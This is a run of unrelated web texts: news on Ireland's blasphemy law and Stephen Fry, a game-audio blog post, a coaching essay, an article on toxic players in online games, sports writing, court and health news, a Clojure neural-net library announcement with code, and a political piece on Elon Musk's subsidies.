A complaint that Mr Fry's comments were in breach of the Defamation Act was made by a man in Ennis Garda station more than two years ago. It is understood that gardaí in Dublin acted on the complaint in recent weeks after the complainant wrote to Garda Commissioner Nóirín O'Sullivan earlier this year to inquire into the status of the investigation.
Mr Ahern said on Monday that the difficult economic circumstances in 2009 meant he did not want an expensive referendum.
“If a referendum had been called it would have brought every headbanger in the country, on both sides, into the debate,” he added.
Law ‘diluted'
Mr Ahern told RTÉ's Today with Sean O'Rourke show he did not introduce the blasphemy law, “all we did was dramatically dilute it”.
He said a referendum to delete it should be held, attached to a number of other issues.
The former minister said that when he took over the office in 2008 the blasphemy law was not a priority for him, given escalating gang violence at the time.
The following year he was advised by the Attorney General that a change in the wording was required.
“The media had lobbied for change in relation to defamation and slander. The Constitution says there is a mandatory obligation to have a law on blasphemy,” Mr Ahern said.
He added the Law Reform Commission had also advised the blasphemy law was not appropriate but he was not prepared to call a referendum on the issue.
“Having a referendum on this issue on its own would have been a waste of time. In the economic climate of 2009 I decided not to have an expensive referendum.
Mr Ahern said he had been advised by a constitutional law expert who said that the legislation fulfilled the constitutional obligation to have the crime of blasphemy included.
“We put in so many hurdles for it to go forward to prosecution. We couldn't do anything. I made a judgment.
He added that under the current legislation the prosecution had to show that the person intended insult and he said that would be difficult to prove.
The Department of Justice has confirmed that preparatory work has begun on a referendum on blasphemy.
A spokesman for the department said the Government had proposed a number of referendums be held during its term, including one on the question of amending Article 40.6.1(i) of the Constitution to remove the offence of blasphemy.
“Preliminary consultations and preparatory work have been undertaken,” the spokesman said.
Further work will be necessary to prepare a Referendum Bill and a Bill to amend the current legislative provision for the offence of blasphemy contained in the Defamation Act 2009, with the “priority and time frame to be decided by Government”.
The man who made the complaint did so on the basis that he believed the comments made by Mr Fry on the programme were a breach of the Defamation Act.
‘Capricious'
When asked by Mr Byrne what he would say if he was confronted by God, Fry replied: “How dare you create a world in which there is such misery that is not our fault. It's not right. It's utterly, utterly evil. Why should I respect a capricious, mean-minded, stupid God who creates a world which is so full of injustice and pain?”
And when he was questioned on how he would react if he was locked outside the heavenly gates, he responded: “I would say: ‘Bone cancer in children? What's that about?' Because Totally selfish. We have to spend our life on our knees thanking him? What kind of God would do that?”
The footage went viral almost as soon as it was aired and a clip of his comments has now been seen almost nine million times on YouTube.
The actor, who is a prolific user of Twitter, has yet to comment publicly on the developments although in the immediate aftermath of the broadcast he told the BBC that he had been “astonished that it caused so viral an explosion on Twitter and elsewhere. I'm most pleased that it's got people talking,” he said.
The offence of blasphemy, included in the Defamation Act, is punishable by a fine of €25,000 under Irish law.
What does it take to get the right sound for a videogame? How do you get a feel for the direction of the game without playing it first? And how did you get your hair to look so nice?
Posted by MrSm1lez on Nov 21st, 2012
Every game needs the right sound, and in a weird way it becomes the backbone of a game. Code, and graphic design are important of course, but think how easily the greatest of games could be ruined with the wrong soundtrack. Could you imagine if the Dovakihn (Skyrim) sounded like Spongebob Squarepants? Or even something simple, like Navi (Legend of Zelda) not saying 'Hey listen!' everytime she wanted your attention? The sound aspect of a game can noticeably improve a game in the most subtle ways, as well as leaving a huge absence when it's lacking. But how do you know when you've got the sound 'just right'?
Scott (lead developer of DtP) and I have kind of an odd situation; we live on separate land masses, roughly 10,000 miles apart. With roughly a 15 hour time difference, you can see where the difficulties arise. I can't just walk over and see what's on his screen, and sometimes I can't see where a project is heading until a little later down the road. So how do you write music for something you don't know much about yet? On DungeonWars (earlier project) it started with a lot of blind trust, and working out odd problems. It can be tricky, figuring out how to make a 'bloop' sound 'less bloopy', or how to make it 'less of a girrr noise and more of wirrrr'. We worked a few tactics out though over time, a lot of passing youtube videos back and forth when we hear a noise we're trying to describe, and a lot of trial and error.
Most recently though, on Aetherius, I started working on the title track. First thing to work out was how it would sound, and how it would present itself. Would it be a constant sound like Super Mario Bros? Or would it fade in and out softly like Ocarina of Time? From there it was on to writing, figuring out what sounds would fit best, and help out the game the most. I write a little, send it in for an opinion, keep writing, change an instrument, cry in the corner for a bit, then come back and finish writing. It's never something you get right the first time, but the end result is always satisfying. There's nothing like working hard and coming to a great song you can be proud of, and then seeing it put into action with the final product. Determination, and trust that the final product will be something remarkable make the job entirely worth it.
I'll hopefully have a solid rough demo of the Aetherius theme coming out in the next day or two, and I would love to hear the IndieDB communities opinions on it!
Till next time
- MrSm1lez
Warm-up and Cool Down -
Two Crucial Details on Race Day
by Timothy Hale
originally published on M-F Athletic - www.everythingtrackandfield.com In thirty years of coaching successful distance runners I listened to, read about, or discussed with colleagues the merits and shortcomings of many different types of training programs. Many people, athletes in particular, seemed to spend countless hours discussing the benefits of things like high mileage, intense intervals, and hill training. Everyone was looking for the magic formula that would result in huge improvements and the ability to run at the next level and beyond. I don't know how many people found that magic formula but my observations have led me to believe that many athletes and coaches spent all that time for nothing because they spent too little time planning two crucial aspects of racing - WARMUP AND COOLDOWN.
Very simply, the human body is not ready to race in its' normal state. An athlete is very similar to an automobile; they both become more efficient when they have been warmed up. Everyone knows this and is aware of the fact that during the warm-up the respiration rate increases, the heart beats faster and pumps more blood, the muscle temperature and body core temperature increases and the body begins to efficiently process oxygen that is needed to support extreme effort. These and many other things occur to get the body ready to race and once you get the body ready you want to keep it ready until the race begins. Any thing you do to negate the effects of warm-up (like sitting around -too much time between warm-up and race, allowing the body to cool off) will adversely affect the athlete's performance. Timing is crucial, if you stand around too long after the warm-up you will lose most of the benefits and you will have to warm up in the first part of the race. By that time the race will be over for you. The second area of concern is how much warm-up is needed. While this will vary according to the length of the race and things like weather conditions it is safe to say that you should feel warmed up. If you have not broken a sweat, if you do not feel the things mentioned above, you might not have warmed up enough. Experimentation will help determine the correct amount of warm-up but as a general guide I would suggest 20-30 minutes of activity with the culmination of activity coming with 10 or fewer minutes remaining before the race. Once the warm-up is finished get racing shoes on, keep moving and be race ready when the gun goes off. If you make an error on timing it is better to finish the warm-up too close to the race than too long before hand.
Think about this point regarding timing. For practice sessions I have observed that most athletes jog a little, stretch, go out for a short distance run and upon returning to the track they change into flats or spikes, do some accelerations and then jump into the meat of the workout. At the conclusion of the workout they change shoes again, go out for an easy distance run, and upon returning they stretch again to complete their workout. There is little time between any of the phases of the routine and most athletes would express that they felt ready to go when the workout began and they felt fairly good the next day. This is the way you should do it -on practice and race days. However, on race day I have observed many athletes abandon this type of routine for a different one, one with less total warm-up time and they often finish the process too long before the race begins. Why? It may be that they are trying to save energy for the race but any energy saved will be useless because the body is not prepared to use it.
At recent High School and NCAA meets I saw exactly what I have discussed here. The first thing I noticed was people warming up way too early. I watched several teams begin their warm-up run as early as 2 hours before the race. While there might be a good reason for this I could find none as I watched these teams. Almost to a team they returned to the start area within fifteen minutes and that was the last significant activity they did. There may have been stretching and some accelerations done (not in every case) but I am confident that these athletes were closer to a resting state than they were to being race ready when the gun went off. The other fault was that they probably did not warm up up long enough. Fifteen minutes is probably not enough but in this case their timing would have ruined even the best warm-up.
Following the race the next most important thing an athlete will do that day will be the cool down. It is the first and most crucial part of recovery from the race effort and a good thorough cool down will not only help get you ready for upcoming workouts but will help prevent injury. In practice your body learns to handle stress and develops the ability to recover through moderate exercise. You must use this ability to get ready for future workouts and races. It is important that each athlete cool down at a pace that is comfortable for them but it is also important that it not be too brief. A nice easy distance run of approximately the race distance is a reasonable rule of thumb and with some thorough stretching will help the athlete begin the recovery process and get ready for what lies ahead. Athletes who do a complete cool down always feel better the next day than when they do not do one. They are ready to go out and resume training for the next race. Too often I have observed athletes heading for the showers shortly after the race and I know they will not recover as well as the person who cools down properly.
In summary, don't waste endless hours of planning a training regimen by cutting corners on two crucial race day needs. Warm-up thoroughly and time it so that you are "warmed up" at race time and ready to go. When the race is over begin your recovery with a complete cool down and you will be preparing the body for the challenges ahead.
With more than 30 million players, Overwatch is an undeniably popular game, but that kind of reach comes with drawbacks, such as toxic players who want nothing more than to ruin everyone's fun. Blizzard has routinely discussed its approach to dealing with the worst elements of the Overwatch community, but in a refreshingly honest developer update, game director Jeff Kaplan explained the cost of coming up with new tools and resources to deal with the toxicity: other features and maps aren't being worked on, so they're taking longer.
"We want to make new maps, we want to make new heroes, we want to make animated shorts," said Kaplan. "But we've been put in this weird position where we're spending a tremendous amount of time and resources punishing people and trying to make people behave better."
Kaplan's tone was somber, conveying understandable exhaustion at the problem. And yet, it would have made more sense to adopt an attitude that postured Blizzard was proud of how much work it was putting into investing in Overwatch's community, their actions actually prove it. You can't build a community-focused video game in 2017 without dealing with shitlords, and while no one doubts Blizzard is working their ass off, it comes across as a little strange Blizzard seems surprised a post-Gamergate world is full of emboldened bad actors.
In any case, new maps and new heroes are nice, but if the community becomes poisoned, it doesn't matter By putting community front and center, by delaying the features that are normally prioritized by a developer, Blizzard is actually doing right by fans, emphasizing the long-term viability of Overwatch. It's work to ensure Overwatch is a place that's welcoming.
If Blizzard succeeds, most players won't notice. As with most things in life, it's easier to recognize when something goes wrong. It's rare to praise something because it works.
This is hardly a new problem for Blizzard, either. When I asked developers for stories of how dealing with toxic elements of communities impeding their ability to work on the game itself, I heard from a former developer of Blizzard, who pointed me towards a wild moment from the early days of World of Warcraft, as Blizzard was still getting their feet wet with with the MMO.
At one point, World of Warcraft had two items called Grimoire Noose, a piece of equipment, and Maine Coon, a pet that could fight along the player and be carried with them. While the latter item's name might give you some pause, it's a legitimate reference to an awesome type of cat.
In the game's global chat room, a number of words were banned, including "coon," because it's a slur meant to deride black people. However, crafty racist players found a loophole: it was possible to link to the Maine Coon item in the chat, thereby getting around the ban.
Soon, some players began spamming chat with Grimoire Noose and Maine Coon.
Blizzard picked up on this form of racial trolling fast, the developer told me, but the company was presented with two options. If they took the item away, they'd be in trouble with players who didn't do anything wrong. The alternative, however, required an enormous amount of work for a bunch of people. The decision was made to change Maine Coon to Black Tabby.
While seemingly a tiny decision, it came with consequences for various parts of the team. Not only did the item Maine Coone have to be changed to Black Tabby, but the creature name had to be changed, the cat carrier altered, the description for the cat carrier changed. Then, the localization team had to translate all those changes to every language the game was played in, and a patch had to be developed, tested, and deployed to enact the changes.
Even then, a change like this caused problems with the community, with some offended that Blizzard chose to show a sense of compassion for minority players who enjoyed their game.
On fan sites, there are still people bitter about the decision.
"Political correctness," said one player in early 2016, "the art of telling people they are too mentally fragile and immature to handle reality in such a way that they thank you for it."
Of course, moments like this are not exclusive to Blizzard games, nor even big games.
"We actually noticed a dip in our retention numbers of new players because of [this toxic player's] actions."
A few years back, developer Tim Brenner worked for a small studio called Blue Frog Gaming. There were only 14 people at the company—five developers, two community managers, four artists, and three managers/executives—so it was a tiny but focused crew.
One of their games was a browser-based strategy game called Darkfire Galaxies. (It's no longer online.) But when the game launched and players started showing up, they ran into a problem with one player in particular, someone who wouldn't stop appearing and acting up.
"His name was BigDawg if I remember correctly," said Brenner.
BigDawg.
BigDawg would say "the nastiest thing you could think of," create multiple accounts to prevent the developers from banning him, and drop all manner of offensive remarks into the game's global chat, the kinds of remarks that even Brenner didn't want to repeat to me.
Trolls who trot out racism and other toxic remarks are nothing new to online games, but what prompted Brenner and his team to take notice was watching their player count going down.
"We actually noticed a dip in our retention numbers of new players because of his actions," he said. "And I get it, I mean—You sign in to a new game for the first time and just see a wall of the N-word in global chat."
They soon realized BigDawg was a player who'd been banned from of their other games, and worried his behavior would have a domino effect on Darkfire Galaxies and stunt growth.
"After that," said Brenner, "we stopped all development on new features and had to implement chat filtering (which didn't work), IP banning (which just made him use proxy servers), and then creating a mod system for chat. All of these were on the roadmap, but the game was so small we didn't think we would need them right away."
Nothing worked. The solution, apparently, was blocking half of New Zealand.
"All his proxies were from that region," said Brenner, "and we had no other players there yet."
BigDawg had finally been extinguished.
Something tells me Overwatch's problems can't be solved by outright banning half of a country, but it goes to show the amount of creativity (and work) required to make sure players can jump into a game and have a good time. If you're having a good time, it worked.
Follow Patrick on Twitter. If you have a tip or a story idea, drop him an email here.
Have thoughts? Swing by Waypoints forums to share them!
Image of LeSean McCoy, September 9, 2013 Kickoff Sunday bakes in the late-summer humidity. As much as I cherish the titanic struggles of the NFL a day after raking leaves, and revel in the epic snow games of December, there's something acutely magical about Week One.
It's the end of hibernation, feasting groggily on warmed-over preseason games, and endless days of mundane baseball. Football is the jewel of autumn and winter, but it's humanitarian aid dropping in beside the cars of home-bound, enjoy-the-beach-while-you-can shoobies.
Week One is oftentimes as fondly remembered by me as an Eagles fan as their later-season victories over the Cowboys, and their playoff thrillers. It's the familiar groove, a warm bath. Previous Sundays of spring and summer were directionless exercises in whimsy, just empty hours before returning to a weekly grind. In football season, Eagles season, those Sundays provide framework for many memories, in particular that first step into a new year.
It was underneath an overcast New Jersey sky that my brother and I watched an uprising on September 3, 2000. Behind unproven Donovan McNabb, the powerful legs of Duce Staley, and the determined might of Hugh Douglas, the Eagles gassed up on pickle brine 1300 miles southwest outside of Dallas, and stuck a knife into a decaying Cowboy legacy. Troy Aikman suffered one of his final head injuries in the fray, easily won 41-14 by the Eagle resurgence.
As McNabb threw down his best Dr. J impression over the crossbar on a fourth quarter score, the Henry siblings matched his jump with our own living room leap. Those painful few years from the rot of the Ray Rhodes era were melting away like powdered snow.
Four years later, it was with the same glee that we took in McNabb's indulgence of a new weapon: Terrell Owens. Opening day 2004, McNabb and Owens made sweet music in the Meadowlands, hooking up for three touchdowns in the start of what we thought was an era of excellence, but ended like a bitter divorce within 14 months.
Other years were just as venomous in the beginning. 2003 saw the Buccaneers open up the Linc with a spanking, clubbing the Eagles 17-0 on Monday Night Football, despite Sylvester Stallone rallying the crowd near the mezzanine. In 2010, Birds like Kevin Kolb and Leonard Weaver were plucked and stuffed as the Packers rained on the 50th anniversary celebration of the 1960 Championship team, under a literal downpour.
Some years held hope. With the helping hand of new playmaker DeSean Jackson, Philadelphia pummeled the Rams 38-3 in 2008. Just a year ago, the first glimpse of Chip Kelly's up-tempo offense had the Redskins' heads spinning, almost from the word 'go'.
These first impressions didn't always define the season, even if they did alter our moods. McNabb busting his ribs vs. the Panthers to kick off 2009 had us fearing the season was done for. That handy Rams beating in 2008 made no indication of the crossroads that lie ahead that November, when McNabb needed to be benched in order to get his mojo back.
Ricky Watters' "For whom, for what?!" diatribe was a bad omen to start 1995 (and nowhere near as entertaining as the legendary story of Watters' undersized girlfriend cussing out offensive coordinator Jon Gruden the same day). Ray Rhodes erupted into an obscenity-laced speech following the opening day loss to the Giants in 1997, with the edited TV version blaring more bleeps than audible words.
In a matter of days, we'll all witness the beginning of Chip Kelly's sophomore season, the first Week One to see Nick Foles trade the clipboard for the audio helmet. The high expectations thrive in correlation with our eagerness to get through this likely-to-drag calendar week.
The determination to see the team kick off the season 1-0, their fourth consecutive Week One win (which the Eagles have never pulled off since the merger), is matched by the familial atmosphere of relevant pigskin canon dominating our Sundays.
Take it all in. Welcome back.
Follow Justin Henry on Twitter
Supreme Court judges sought the stand of civil aviation ministry and Air India on a plea made before the court by Shanavi Ponnuswamy. (Picture for representation)
The Supreme Court on Monday gave hope to a man "denied" a cabin crew job by Air India after he underwent a sex change surgery to become a woman. The person is now being treated as a "transgender".
The judges sought the stand of Civil Aviation Ministry and Air India on a plea by Shanavi Ponnuswamy, who told the court that she did well in her tests, but was not absorbed due to her transition.
She had applied for a cabin crew job with Air India in female category. She also said that her repeated representation to Civil Aviation Ministry had fallen on deaf ears.
"I have taken four attempts so far but unfortunately has not been shortlisted by Air India for the post in question even after faring well in the tests conducted.
"I have learnt that I have not been able to make the cut on account of the fact that I am a transgender and the vacancies in the cabin crew were earmarked only for women," Shanavi said.
She cited a Supreme Court judgment of April 2014 - which has recognised the rights of transgender as a third gender, to bolster her case.
In a historic judgment, paving the way for lakhs of transgenders to join the mainstream, the Supreme Court had granted legal recognition to the community.
Upholding their demand for treatment at par with male and females, the court had directed the central and state governments to treat people belonging to the transgender community as "socially and educationally backward classes". The court had also ordered the government to provide them reservation in educational institutions and jobs.
"Issue a writ or direction in the nature of a mandamus directing the respondents (Air India and Civil Aviation Ministry) to consider the candidature of the petitioner for the post of Cabin crew in Air India", the prayer in Shanavi's petition said.
"The Transgender Persons (Protection of Rights) Bill, 2016 prohibits discrimination. It is clear that no person shall discriminate against a transgender person in relation to employment or occupation," her plea said.
The right to chose one's gender identity is an essential part to lead a life with dignity which again falls under the ambit of Article 21. Determining the right to personal freedom and self determination, SC had observed that the gender to which a person belongs is to be determined by the person concerned.
"SC has given the people of India the right to gender identity. Further, they cannot be discriminated against on the ground of gender as it is violative of Articles 14, 15, 16 and 21", the plea said.
The case comes close on the heels of sacking of a male sailor by Navy after he underwent sex change and Delhi High Court asking Navy to consider giving her a alternate job terming it an "out of the box situation".
Calling for a change in mindset, the bench had said, "Here is an opportunity to look at it from a different perspective. It is an out of the box situation. It maybe a first of its kind situation."
"Here is a person struggling with gender identity. Had she suppressed the condition and continued, it would have been dangerous. It could have been fatal."
"Think about it and come back," the bench said and listed the matter for further hearing on November 23.
CHANDIGARH: Mothers who start breastfeeding their children early have 18% less chances of having heart attack and stroke risk as compared to mothers who don't breastfeed, revealed a study by Dr. L.K. Jha a Senior Interventional Cardiologist Dr. Jha said that breastfeeding has both short term and long term benefits to mothers on matters related to cardiovascular health. In short term, it benefits by helping in weight loss, lowering cholesterol, controlling blood pressure and glucose levels after pregnancy The study throws light on effects of breastfeeding on cardiovascular system in which 29,000 middle aged women has been analysed. The study also highlights benefits of breastfeeding in reducing risk of cardiovascular disease such as stroke and heart attack in mothers by as much as 18 percent.Dr Jha further informed that it has been seen that mothers who breastfeed 2 children would double protection themselves as compared to those who breastfeed only one.“Pregnancy changes a woman's metabolism dramatically as she stores fat to provide the energy necessary for her baby's growth and for breastfeeding once the baby is born. Breastfeeding could eliminate the stored fat faster and more completely. Hence reducing CVD risk later in life .Breastfeeding can contribute significantly in reducing burden of heart disease among women. Women are more prone to risk of death from heart attack as compared to men, mainly because of lack of awareness on heart disease among women.”Ignoring early signs of heart attack such as chest pain, shortness in breath can lead to heart disease becoming more complex which is hard to treat, pointed out Dr Jha.
Observations from Game 2 of the NBA Finals:
• If there was something not quite right during the drudgery of the Heat's regular season, it was pretty clear: The defensive intensity and precision and detail too often weren't up to the standards Pat Riley and his successors demand in this no-excuses Heat culture. Chris Bosh complained in March that the Heat “couldn't stop a nosebleed.”
Sign Up and Save Get six months of free digital access to the Miami Herald
The Heat's field-goal percentage against, in the top six each of the previous three seasons of the Big 3 era, slid to 15th. The Heat relinquished 2 1/2 more points per game both this season, and this postseason, than a year ago.
The Heat's defense again malfunctioned to start Game 2, with the Spurs opening 13 for 21 from the field, repeatedly penetrating into the paint and scoring an easy basket off an inbounds pass that left Dwyane Wade throwing up his hands in disgust.
But then something simple and critical happened: “We got in 'em more,” as LeBron James put it.
The Heat's defense was exemplary for most of the fourth quarter, and that was one of the two biggest reasons for this win, along with James' monster eruption.
Spurs shots in the fourth were fiercely challenged, with just a few exceptions. Close-outs on three-point shooters were quick and decisive. More often than not, Heat defenders kept Spurs players from driving past them, as Ray Allen did against Manu Ginobili on two late possessions that ended with a turnover and missed jumper. “I got lucky,” Allen said.
After shooting 14 for 16 in the fourth quarter of Game 1, the Spurs were 6 of 17 in Game 2. San Antonio closed at 43.9 percent from the field after shooting 58.8 percent in Game 1.
“We forced them to make shots over the top,” Allen said. “Better attention to detail.”
Wade said, “We switched a little but gave them different looks. Guards were fighting over screens.”
The Heat fouled too much early in the fourth, putting the Spurs in the bonus for the final 6:42, but San Antonio missed four of six fourth-quarter free throws.
Part of this was maniacal effort. But there were other nuances. The Heat changed up its pick-and-roll defense at times to “throw them off,” as Rashard Lewis said.
And this was huge: Erik Spoelstra had a player with size defend Tony Parker for much of the second half — James primarily and Wade at times.
And Chris Andersen (for large doses), Bosh and Lewis kept Tim Duncan in check the final third quarters. Duncan shot 5 for 6 in the first quarter, just 2 for 8 after that.
• You had to love Bosh's attacking mentality. He didn't even attempt a three-pointer until the fourth quarter, and his three with 1:18 left put the Heat ahead for good.
“One of the most stable, mentally tough guys I've ever been around,” Spoelstra said. “That's why it raises the hair on the back of my neck when people question him.”
Bosh said if James is the most-targeted player in the NBA, “I'm probably No.2.” But more is needed on the glass than his three rebounds in 36 minutes.
• Spoelstra went slightly deeper into his bench, bypassing Shane Battier and opting instead for cameos for James Jones and Udonis Haslem.
Twice during these playoffs, James publicly expressed a desire for Jones to play more. Twice, Jones has played in the next game. Jones logged nearly seven minutes, one fewer than he had played since the start of the Eastern Conference finals. Jones missed both of his shots, but he helps spread the floor when James is on the court.
• The Biggest revelation of these Heat playoffs? Rashard Lewis, who played just 22 minutes between Feb. 1 and March 25. Lewis not only hit three three-pointers on a 14-point night but made a couple of nifty moves around the basket.
• Quick stuff: The Heat is now plus-11 with James on the court in this series and minus-24 with him off. The Heat has won at least one road playoff game in 16 consecutive series, extending its NBA-record streak. That's remarkable. So is Miami winning 13 playoff games in a row after losses. ... With Duncan hauling in 15 rebounds and Boris Diaw 10, James' 10 rebounds and Andersen's nine were huge. And Wade had seven.
MANILA, Philippines - Members of the civilian police force at the University of the Philippines campus in Diliman, Quezon City will now conduct patrols while on bicycles.
The Quezon City Police District (QCPD) donated 10 bicycles, which were received by professor Edgardo Dagdag, chief security officer of UP Diliman.
While policemen and other uniformed personnel are not allowed on the 493-hectare campus, the provision of bicycles will help them provide security assistance to the state university, QCPD director Senior Superintendent Richard Albano said.
â€œWith these bikes, itâ€™s like we are already patrolling the campus,â€ Albano said in jest.
Dagdag said while there is a setup prohibiting uniformed personnel on campus, there are ways of cooperation with the police to ensure safety on campus.
Albano said the donation was a practical peacekeeping move.
â€œAny crime committed inside the campus eventually falls into the hands of the QCPD. Helping the UP police to prevent crime or catch perpetrators is, therefore, beneficial to all parties,â€ he said.
tl;dr: I wrote Flare, a Dynamic Neural Net library in Clojure. It currently can do some non-trivial things and it's pretty fast: over 3x faster than PyTorch for a CPU-based a simple Bi-LSTM classifier (although PyTorch has many more features and is more stable).
Why do we need another Neural Net library?
It'd been a few years since I directly wrote a large piece of software, and one of my goals this year was to just that. One of the surprising things to have changed software-wise in that time is that Python has become the defato language for a lot of machine learning work. Presumably, a lot of this is due to strong auto-grad neural net libraries like TensorFlow, PyTorch, DyNet, and several others which delegate to native code for performance. While I really like PyTorch's clean interface and generally prefer it amongst popular neural net libraries, I wanted to primarily work in Clojure, which I'm incredibly productive in and has a lot to offer for building large ML-systems.
“Since this was for fun, I made the unpragmatic choice to write something from scratch”
After looking at some JVM options for dynamic neural nets, none quite felt right or at the same level of simplicity as PyTorch. Since this was for fun, I made the unpragmatic choice to write something from scratch. I think the result shares a lot with PyTorch, but feels like it was made for a functional programming language; it also appears for CPU workloads I've tried, that it's much faster. I think Clojure, and functional languages generally, have a lot to offer for ML and ML-related work, but I think the absence of a good non-Python choice has made that harder.
Some Simple Flare Examples
Like other auto-grad neural net libraries, you implicitly define a graph of operations over tensors, where each leaf is either a constant, input, or model parameter. Each non-leaf node represents some automatically differential operation (matrix multipication, sigmoid transform, etc.). Here's a simple example in Flare:
( ns example ( :require [ flare.core :as flare ] [ flare.node :as node ] [ flare.computation-graph :as cg ])) ( flare/init! ) ( def x ( node/const [ 1 1 ])) ;; define vector of length 2 ( def M ( node/const [[ 1 2 ] [ 3 4 ] [ 5 6 ]])) ;; define 3x2 matrix ( def z ( cg/* M x )) ;; z = Mx ( :value Z ) ;; returns [3.0, 7.0, 11.0] ( :shape Z ) ;; returns [3]
The computation happens eagerly, you don't need to call forward on any node, the operation happens as soon great the graph node is created. You can disable eager mode if you prefer lazier computation. Like PyTorch and others, nearly all the math operations actually happens in native code, in this case using Intel MKL via the awesome Neanderthal library, however you can plug in different tensor implementaitons (e.g., ND4J).
While the above example is slightly verbose compared to PyTorch, for longer pieces of code you get more expressiveness. Like PyTorch, one of the core abstractions is a module, which closes over parameters and builds a graph given inputs. In Flare, a module closes over other modules or parameters, and knows how to generate graphs from input(s). Here's what my LSTM cell implementation looks like (see here), with some minor edits for clarity:
( defn lstm-cell [ model input-dim hidden-dim ] ( let [ cat-dim ( + input-dim hidden-dim ) ;; stack (input, output, forget, state) params ;; one affine module W_(i,o,f,s) * x_(prev, input) + b_(i,o,f,s) input->gates ( module/affine model ( * 4 hidden-dim ) [ cat-dim ]) zero ( flare/zeros [ hidden-dim ]) init-output ( node/const "h0" zero ) init-state ( node/const "c0" zero )] ( reify RNNCell ( add-input [ this input [ last-output last-state ]] ( let [ x ( cg/concat 0 input last-output ) gates ( module/graph input->gates x ) ;; split (i,o,f) and state [ iof, state ] ( cg/split gates 0 ( * 3 hidden-dim )) ;; split iof into (input, forget, output) [ input-probs forget-probs output-probs ] ( cg/split ( cg/sigmoid iof ) 0 hidden-dim ( * 2 hidden-dim )) ;; combine hadamard of forget past, keep present state ( cg/+ ( cg/hadamard forget-probs last-state ) ( cg/hadamard input-probs ( cg/tanh state ))) output ( cg/hadamard output-probs ( cg/tanh state ))] [ output state ])) ( init-hidden [ this ] [ init-output init-state ]))))
Despite the simplicitly, the above implementation is incredibly efficient since nearly all the floating-point operations happen in a single matrix-vector multiplication. Here's an example of building a simple bidirectional LSTM sentiment classifier for a given sentence using a module:
( defn lstm-sent-classifier [ model word-emb lstm-size num-classes ] ( node/let-scope ;; let-scope so the parameters get smart nesting of names [ emb-size ( embeddings/embedding-size word-emb ) num-dirs 2 input-size ( * num-dirs emb-size ) hidden-size ( * num-dirs lstm-size ) lstm ( rnn/lstm-cell model input-size hidden-size ) hidden->logits ( module/affine model num-classes [ hidden-size ])] ( reify module/PModule ( graph [ this sent ] ;; build logits ( let [ inputs ( embeddings/sent-nodes word-emb sent ) [ outputs _ ] ( rnn/build-seq lstm inputs ( = num-dirs 2 )) train? ( :train? ( meta this )) hidden ( last outputs ) hidden ( if trained? ( cg/dropout 0.5 hidden ) hidden )] ( module/graph hidden->logits hidden ))))))
After you build the classifier, you can check out the parameters using the model. A model can act as sequence of the (param-name, parameter) pairs:
( def model ( model/simple-param-collection )) ( def embed ( load-word-embeddings some-file )) ( def classifier ( lstm-sent-classifier model emb 25 2 )) ( for [[ param-name parameter-node ]] [ param-name ( :shape parameter-node )] model ) ;; ([lstm/input->gates/b [200]] [hidden->logits/W [2 50]] ;; [lstm/input->gates/W [200 650]] [hidden->logits/b [2]])
Performance
The big surprise with Flare has been that performance is relatively strong compared to PyTorch, about 2x-3x faster for the models I've built in Flare. While I've optimized the obvious things in Flare, there is still a lot more low-hanging fruit. I suspect some of the performance wins relative to PyTorch are coming from graph construction itself. While PyTorch and Flare both fallback to Intel native MKL on CPU, graph construction happens in the host language (Python or Clojure) and this is where PyTorch and Flare can differ performance-wise; this makes a large difference for dynamic neural nets where graph construction happens for each input.
As a simple example, I compared a simple Bi-LSTM sentence classifier task in Flare and PyTorch. The data is binary sentiment data using the Stanford Large Movie Review Dataset and GloVe Vectors. Here is the Flare train/eval script and here's the PyTorch one. Note that, each iterations runs forward/backwards on training data, but also evaluates on train/test sets, so there's a 3:1 mix of forward versus backward computations. On my recent MPB laptop, running both of these scripts yields the following average iteration time (over 10 iterations, 5 runs):
Library Secs / Iter Loss Train Acc. Test Acc. PyTorch 362.7 1197 96.7% 95.4% Flare 108.9 360 98.3% 96.7%
The performance difference isn't suprising, but the difference in loss function value and train/test accuracy is given the model and data are identical. I tried hard to make the two implementations as close as possible down to the same choice of optimization hyper-paramters used in AdaDelta on either side. The only things I can't account for are (a) parameter initializations (b) bugs in either library. I suspect the difference in accuracy is mostly due to different choices of how parameters are initialized. I've also added a bump test to verify the gradients in the end-to-end model are accurate, since it's very easy for a subtle bug to yield performance a point or two lower.
Up Next
While I'm not 100% sure the world needs another neural net library, I'm interested in building this out more as long as it's fun and I'm hitting interesting challenges. Here's a list of things I'd like to get to
A conservative advocacy group has a special name for liberal bloggers who have rushed in to defend the business practices of Elon Musk, the multibillionaire co-founder of taxpayer-funded renewable energy and space technology companies. It calls them “stoogers.”
Despite “mounting evidence of cronyism by his crumbling empire, Elon Musk has tapped stooge-like left-wing bloggers to come to his defense,” according to a press release from Citizens for the Republic, a grassroots conservative group based in Alexandria, Virginia.
“Musk should not be permitted to bail out his own companies with taxpayer money,” @dianasbpa says.
The group bitingly defines a “stooger” as “a liberal person … living in their basement spewing left-wing prevarications and slander via blogs, which few read.”
For months now, Citizens for the Republic has been sharply critical of Musk and the government subsidies that flow into his companies. In recent days, however, liberal bloggers and left-leaning news outlets have published articles raising questions about the political action committee's motivations, objectives, and funding sources.
Diana Banister, a partner in Shirley & Banister Public Affairs and executive director of Citizens for the Republic, told The Daily Signal in an interview that she suspects the blogs “received their marching orders from Musk” in the aftermath of the November elections.
With Donald Trump about to move into the White House, Musk knows that lawmakers may be more inclined to move against “crony government deals” that benefit his companies, Banister said.
Citizens for the Republic keeps tabs on Musk's corporate enterprises at the “Stop Elon From Failing Again” website.
“If Musk is suddenly afraid of us and what we are exposing, this might be his reaction to the election results,” Banister said. “He's panicked and so are his supporters, and this might explain why you see these obscure left-wing blogs popping up to attack us.”
The Daily Signal sought comment from two of Musk's companies, SolarCity and Tesla Motors, on the criticism of his business practices and the allegation that he recruited bloggers to defend him. Neither organization has responded.
Musk, 45, is a South African-born, Los Angeles-based business mogul who has gained fame for his efforts to combat global warming and to establish a human colony on Mars.
But Musk also has been subjected to widespread criticism for pulling in billions of dollars in government subsidies for companies that produce electric cars, sell solar panels, and launch rockets into space.
Tesla Motors Inc., SolarCity Corp., and Space Exploration Technologies Corp., widely known as SpaceX, cumulatively have benefited from about $5 billion in government subsidies, according to data compiled by the Los Angeles Times from government sources.
Tesla and SolarCity consistently have reported net losses while SpaceX, as a private outfit, does not release financial reports to the public. On Nov. 17, Tesla shareholders approved a $2 billion acquisition of SolarCity.
Musk was chairman and co-founder of SolarCity, a solar energy company based in San Mateo, California. He was also chairman and founder of Tesla Motors, the electric car company based in Palo Alto, California.
